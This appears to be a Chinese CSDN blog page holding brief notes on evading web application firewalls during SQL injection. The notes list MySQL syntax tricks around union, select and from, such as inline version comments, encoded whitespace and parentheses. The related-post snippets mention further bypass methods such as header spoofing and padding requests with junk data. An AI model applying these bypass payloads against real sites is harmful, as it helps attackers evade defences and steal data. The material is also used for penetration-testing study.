WAF绕过笔记

最新推荐文章于 2024-04-29 16:24:28 发布

十里长亭外

最新推荐文章于 2024-04-29 16:24:28 发布

阅读量344

点赞数

分类专栏： sql注入文章标签： select waf绕过 MySQL

本文链接：https://blog.csdn.net/z542234920/article/details/70227095

版权

sql注入专栏收录该内容

1 篇文章 0 订阅

订阅专栏

整理的一些笔记
1.参数和union之间

select * from users where id=\Nunion select 1,2,3;
1.1union
8eunion
/*!50001union*/

2.union和select之间
空白符 %09 %0c %0a %0b %0c %0d %a0

union(select)

3.select和from之间

select(1)(2)(3)from
select-1 from
select+1 from
select~1
select!1
select@`id`
/*!50001select*/
select'☺',-2,'3'from
select"☺"

4.select from 之后

from`users`
/*!50001from*/
 from{x users}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

十里长亭外

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

记录waf绕过

qq_43987112的博客

05-22

740

waf绕过笔记

WAF介绍和绕过

weixin_60757883的博客

04-07

446

WAF介绍和分类 WEB应用防火墙 (Web Application Firewall) 定义：通过执行一系列针对HTTP/HTTPS的安全策略来防御对Web应用的攻击。 WAF的分类硬件WAF 软件WAF 云WAF 内置WAF 二．WAF工作原理 WAF工作原理三．WAF检测规则 WAF指纹识别四．WAF绕过方法主要介绍 SQL 注入漏洞的绕过方法，其余漏洞的 WAF 绕过方法在原理上是差不多的 1. 大小写混合在规则匹配时只针对了特定

参与评论您还未登录，请先登录后发表或查看评论

某教程学习笔记（一）：23、WAF绕过

weixin_41489908的博客

03-25

475

我睡了一下午，醒的时候发现，屋子里黑漆漆的，一点声音都没有，抬头望了望窗户，天还没完全黑，四处摸摸，在枕头下找到手机，打开屏幕，干净，没有一条信息。。。一、目录扫描绕过WAF 1、dirbuster扫描，默认的UA为：DirBuster-0.12 (http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project) 2、安全狗会拦截...

长亭waf绕过1.pdf

07-09

长亭waf绕过1

最全的文件上传漏洞之WAF拦截绕过总结

mingyqf的博客

03-23

3318

https://cloud.tencent.com/developer/article/1944142

WAF的识别、检测、绕过原理与实战案例

2301_81250923的博客

11-30

2211

WAF通过配置DNS解析地址、软件部署、串联部署、透明部署、网桥部署、反向代理部署、旁路部署等获取攻击流量，基于规则进行攻击特征匹配，或利用其他方式进行攻击检测及阻断。

WAF攻防实战笔记v1.0--Bypass.pdf

03-30

本笔记详细介绍了绕过WAF的方法和实战技巧，涵盖服务器特性、数据库特性、应用层特性和WAF层特性等多个方面。以下是从文件中提取的关键知识点： ### 服务器特性在服务器层面，攻击者会利用特定服务器软件的特性或...

渗透测试之waf绕过基础

qi_SJQ_的博客

01-28

3820

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档文章目录思维导图一、pandas是什么？二、使用步骤 1.引入库 2.读入数据总结思维导图：一、信息收集此处只针对对于目标网站直接扫描的信息收集讲解，其他辅助信息收集手段如：查旁站/识别cms等手段也不会遇到waf拦截。 1.安全狗—防ddos cenos目前用的不熟练，于是我将服务器系统换成了winserver，搭建上web环境和安全狗，打开cc拦截开关，本地.

渗透笔记-深入WAF绕过知识（*＾-＾*）闭关深造去了，笔记在本地暂时不发了

weixin_44532761的博客

11-24

2953

小迪v19 https://www.bilibili.com/video/BV1JZ4y1c7ro?p=18 v18还没写完(￣y▽￣)╭ Ohohoho… 其它绕过方式补充 1.ip白名单从网络层接收ip地址的话没法伪造，如果是获取客户端的ip,可能存在伪ip绕过的情况。修改http的header来by pass waf X-forwarded-for； X-remote-IP； X-originating-IP； x-remote-addr； X-Real-ip 2.静态资源 waf可能

深入waf绕过（云盾，宝塔，安全狗）（19(2)

最新发布

2401_84297035的博客

04-29

322

第二种方法我们是说这个IP地址是通过上面形式获取，在数据包里面，但是要看数据包里面waf的接受方式，因为在这个实战情况下面，他有可能接受你的IP地址是从网络层（tcp/ip）层面接受，如果这个层次数据库修改是不会接受的，意义不大，条件实在是太多，从请求来的数据包里面添加上面这五类。第二种方式静态资源现在一些waf对这个有干扰，但不排除一些新的waf或者在比赛的时候自己创建的waf可能存在这样的绕过方式什么是静态我们举个例子，那本地靶场网站看看。

sqlmap绕过d盾_WEBSHELL免杀绕过WAF思路&方法（一）

weixin_39599830的博客

11-27

602

本文主要介绍WEBSHELL免杀绕过的思路与方法，网上很多的方法基本都被安全厂家加入了检测规则已经不能免杀，所以我们要了解我们主要对手WAF的检测技术，故基于前人优秀基础上我们需要有能力衍生出免杀马，WEBSHELL免杀始终是持续对抗的过程，不可能永久免杀，但也是永远杀不完的。0x00 WEBSHELL的概念：能够接收攻击者的信息指令，并且执行攻击者的指令的程序脚本。 Webshell是运行目标服...

WAF绕过小技巧

tomyyyyy

09-22

6834

一、WAF绕过 1、脏数据绕过即传入一段长数据使waf失效，从而实现绕过waf。某些waf处理POST的数据时，只会检测开头的8K，后面选择全部放过。例如，当发现某网站存在一个反序列化漏洞时，但是无回显，被waf拦截了利用脏数据插入5000个x字符，可以成功绕过。 2、高并发绕过对请求进行并发，攻击请求会被负载均衡调度到不同节点，导致某些请求绕过了waf的拦截 3、http参数污染...

常见6种WAF绕过和防护原理

07-08

1万+

关于上传绕过WAF的姿势！

WAF绕过思路

永远是少年

03-12

3629

WAF绕过思路 WAF在渗透测试中，是我们要面对的第一关卡，渗透测试人员对站点WAF的绕过过程就是渗透测试人员与网站管理员（或WAF开发者）进行PK的过程。在对WAF的渗透时，一般可以考虑采用以下方式展开。一、增加WAF负担 WAF是为网站安全服务的，但是WAF的存在如果干扰了网站的正常运行，则会得不偿失，因此，网站管理员一般会恰当的配置WAF，起到在不会干扰网站正常运行的前提下，对用户的输入进行过滤的作用。因此，有些WAF就会设置如果数据包长度过长，就对部分数据包或者是数据包的部分内容进行无检测“放行”

一些绕过waf的笔记

weixin_42751423的博客

05-03

922

## 一、各种编码绕过** 1.url编码 id=1 union select pass from admin limit 1 经过url编码之后变成 id=1%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%70%61%73%73%20%66%72%6f%6d%20%61%64%6d%69%6e%20%6c%69%6d%69%74%20%31 有些waf并未对...

waf绕过详解

热门推荐

zdy8023的博客

04-13

1万+

目录 waf防护原理讲解目录扫描绕过waf 手工注入绕过waf sqlmap注入绕过waf 编写sqlmap绕过waf脚本过waf一句话编写讲解菜刀连接绕过waf webshell上传绕过waf 提权绕过waf waf绕过原理详解了解waf防护原理查看waf防护位置熟悉防护规则了解防护机制查看拦截时间阀值我们可以下载一个安全狗，查看它详细的防护机制，...

9-Web安全——SQL注入WAF绕过之select及union过滤

网络安全

06-03

1万+

1. select及union过滤绕过真实的注入环境中一般无法通过网站的源代码进行安全审计的，那么在注入过程中我们就需要使用常见的SQL注入绕过技巧来帮助我们进行绕过WAF。首先需要判断网页的注入类型，输入参数?id=1%0Aand%0A1=2，测试URL为： http://www.sqli.com/Less-27/?id=1%0Aand%0A1=2 页面返回的结果如下：当我们输入id=1 and 1=2时，页面还是正常返回，说明这是一个字符型注入。然...

一个账户接管几乎所有阿里巴巴网站(CSRF漏洞+WAF绕过)

weixin_30437481的博客

04-15

1万+

场景文章是关于某些客户端漏洞导致几个阿里巴巴网站的帐户被接管。条件 TL;DR 必要条件，例如JSONP，某些浏览器处理cookie等行为。攻击原理大多数阿里巴巴的网站加载并执行外部JavaScript对象，JavaScript代码从名为的cookie中获取值uid。攻击者可以uid代表受害者将价值改变为恶意有效Payload，从而导致帐户接管。漏洞发现的简要步骤 1、找到一...

waf绕过方法总结

gugonggugong的博客

12-30

2911

一、WAF防护原理 1. bypass 客户端JavaScript校验；服务器校验；文件内容头字段、编码校验；后缀名黑名单校验；自定义正则校验；waf设备校验；有些waf不会防asp/php/jsp后缀文件，但是他会检测里面的文件； WTS-WAF bypass ; baidu colud bypass; aliyun waf; 安全狗上传bypass；云锁上传bypass； 2. defense ...

WAF绕过技术：冷门函数与策略规避详解

本文主要介绍了在信息安全领域，特别是针对Web应用程序防火墙（WAF）的绕过技术。这些技术涉及到数据库查询注入、编码转换、特殊语法利用和冷门函数的应用，目的是为了规避WAF的检测，实现攻击或漏洞利用。在...